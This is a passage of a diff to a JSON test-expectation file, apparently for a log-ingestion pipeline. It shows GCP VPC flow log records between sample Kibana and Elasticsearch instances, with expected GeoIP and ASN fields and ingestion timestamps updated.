"{\"insertId\":\"y4wffpfk2erof\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":54662,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:45:12.142682672Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:45:12.027895189Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:45:12.027895189Z", @@ -10209,10 +10692,22 @@ "id": "y4wffpfk2erof", "category": "network", "type": "connection" - } - }, - { - "log": { + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:ODIAu0FZz5JAnJ3zuMNp2ecW7FE=", + "bytes": 1776, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "outbound" + } + }, + { + "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, "destination": { @@ -10223,11 +10718,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33572, @@ -10299,7 +10799,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391719Z", + "ingested": "2021-12-14T14:43:27.415226429Z", "original": "{\"insertId\":\"y4wffpfk2erov\",\"jsonPayload\":{\"bytes_sent\":\"11674\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33572},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821056075Z\",\"packets_sent\":\"96\",\"reporter\":\"DEST\",\"rtt_msec\":\"335\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470754779Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.470754779Z", @@ -10321,11 +10821,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33540, @@ -10397,7 +10902,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391723500Z", + "ingested": "2021-12-14T14:43:27.415227668Z", "original": "{\"insertId\":\"y4wffpfk2erop\",\"jsonPayload\":{\"bytes_sent\":\"62831\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33540},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789112562Z\",\"packets_sent\":\"346\",\"reporter\":\"DEST\",\"rtt_msec\":\"313\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074813982Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.074813982Z", @@ -10413,11 +10918,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -10495,7 +11005,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391727600Z", + "ingested": "2021-12-14T14:43:27.415228202Z", "original": "{\"insertId\":\"y4wffpfk2erou\",\"jsonPayload\":{\"bytes_sent\":\"15169\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33574},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821291282Z\",\"packets_sent\":\"93\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466811088Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466811088Z", @@ -10506,41 +11016,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.87.40.76", - "port": 5601, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.13", - "port": 54662, - "bytes": 1464, - "ip": "67.43.156.13", - "packets": 7 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:ODIAu0FZz5JAnJ3zuMNp2ecW7FE=", - "bytes": 1464, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:16.453Z", "ecs": { "version": "1.12.0" @@ -10551,6 +11026,9 @@ "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -10571,8 +11049,33 @@ } } }, + "destination": { + "address": "10.87.40.76", + "port": 5601, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 54662, + "bytes": 1464, + "ip": "67.43.156.13", + "packets": 7 + }, "event": { - "ingested": "2021-12-09T13:37:46.391731300Z", + "ingested": "2021-12-14T14:43:27.415228764Z", "original": "{\"insertId\":\"y4wffpfk2eroj\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":54662},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:12.142682672Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:45:12.027895189Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:45:12.027895189Z", @@ -10580,6 +11083,18 @@ "id": "y4wffpfk2eroj", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:ODIAu0FZz5JAnJ3zuMNp2ecW7FE=", + "bytes": 1464, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "inbound" } }, { @@ -10588,11 +11103,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -10670,7 +11190,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391735300Z", + "ingested": "2021-12-14T14:43:27.415229306Z", "original": "{\"insertId\":\"y4wffpfk2erow\",\"jsonPayload\":{\"bytes_sent\":\"64588\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33560},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"362\",\"reporter\":\"SRC\",\"rtt_msec\":\"11\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075859688Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075859688Z", @@ -10692,11 +11212,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33536, @@ -10768,7 +11293,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391738600Z", + "ingested": "2021-12-14T14:43:27.415229792Z", "original": "{\"insertId\":\"y4wffpfk2erot\",\"jsonPayload\":{\"bytes_sent\":\"67315\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33536},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565156020Z\",\"packets_sent\":\"354\",\"reporter\":\"DEST\",\"rtt_msec\":\"194\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150481417Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150481417Z", @@ -10790,11 +11315,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -10866,7 +11396,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391743Z", + "ingested": "2021-12-14T14:43:27.415230256Z", "original": "{\"insertId\":\"y4wffpfk2eroq\",\"jsonPayload\":{\"bytes_sent\":\"175633\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33576,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"67\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510464198Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510464198Z", @@ -10882,11 +11412,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33540, @@ -10964,7 +11499,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391748700Z", + "ingested": "2021-12-14T14:43:27.415230730Z", "original": "{\"insertId\":\"y4wffpfk2ero5\",\"jsonPayload\":{\"bytes_sent\":\"116981\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33540,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789112562Z\",\"packets_sent\":\"234\",\"reporter\":\"SRC\",\"rtt_msec\":\"313\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074813982Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.074813982Z", @@ -10986,11 +11521,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33690, @@ -11062,7 +11602,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391754200Z", + "ingested": "2021-12-14T14:43:27.415231124Z", "original": "{\"insertId\":\"y4wffpfk2eroo\",\"jsonPayload\":{\"bytes_sent\":\"67789\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33690},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:48.542406314Z\",\"packets_sent\":\"344\",\"reporter\":\"DEST\",\"rtt_msec\":\"196\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075867049Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075867049Z", @@ -11078,11 +11618,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33538, @@ -11160,7 +11705,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391759800Z", + "ingested": "2021-12-14T14:43:27.415231572Z", "original": "{\"insertId\":\"ptjoddfhmrhg9\",\"jsonPayload\":{\"bytes_sent\":\"136166\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33538,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565124617Z\",\"packets_sent\":\"245\",\"reporter\":\"SRC\",\"rtt_msec\":\"250\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074952616Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.074952616Z", @@ -11171,9 +11716,39 @@ } }, { + "@timestamp": "2019-06-14T03:50:15.857Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "67.43.156.13", + "10.139.99.242" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "destination": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 220 + } + } + }, "destination": { "address": "10.139.99.242", "port": 9200, @@ -11182,13 +11757,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65257, @@ -11196,6 +11774,16 @@ "ip": "67.43.156.13", "packets": 718 }, + "event": { + "ingested": "2021-12-14T14:43:27.415231965Z", + "original": "{\"insertId\":\"ptjoddfhmrhgh\",\"jsonPayload\":{\"bytes_sent\":\"68262\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65257},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220614265Z\",\"packets_sent\":\"718\",\"reporter\":\"DEST\",\"rtt_msec\":\"220\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.403388091Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "kind": "event", + "start": "2019-06-14T03:39:59.403388091Z", + "end": "2019-06-14T03:49:56.220614265Z", + "id": "ptjoddfhmrhgh", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -11207,17 +11795,22 @@ "iana_number": "6", "packets": 718, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:15.857Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.139.99.242" + "67.43.156.14", + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -11234,25 +11827,10 @@ "vpcflow": { "reporter": "DEST", "rtt": { - "ms": 220 + "ms": 36 } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391765300Z", - "original": "{\"insertId\":\"ptjoddfhmrhgh\",\"jsonPayload\":{\"bytes_sent\":\"68262\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65257},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220614265Z\",\"packets_sent\":\"718\",\"reporter\":\"DEST\",\"rtt_msec\":\"220\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.403388091Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", - "kind": "event", - "start": "2019-06-14T03:39:59.403388091Z", - "end": "2019-06-14T03:49:56.220614265Z", - "id": "ptjoddfhmrhgh", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -11261,11 +11839,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 52328, @@ -11273,6 +11856,16 @@ "ip": "67.43.156.14", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415232364Z", + "original": "{\"insertId\":\"ptjoddfhmrhgj\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":52328},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:20.952481728Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:42:20.842840991Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "kind": "event", + "start": "2019-06-14T03:42:20.842840991Z", + "end": "2019-06-14T03:42:20.952481728Z", + "id": "ptjoddfhmrhgj", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -11284,7 +11877,9 @@ "iana_number": "6", 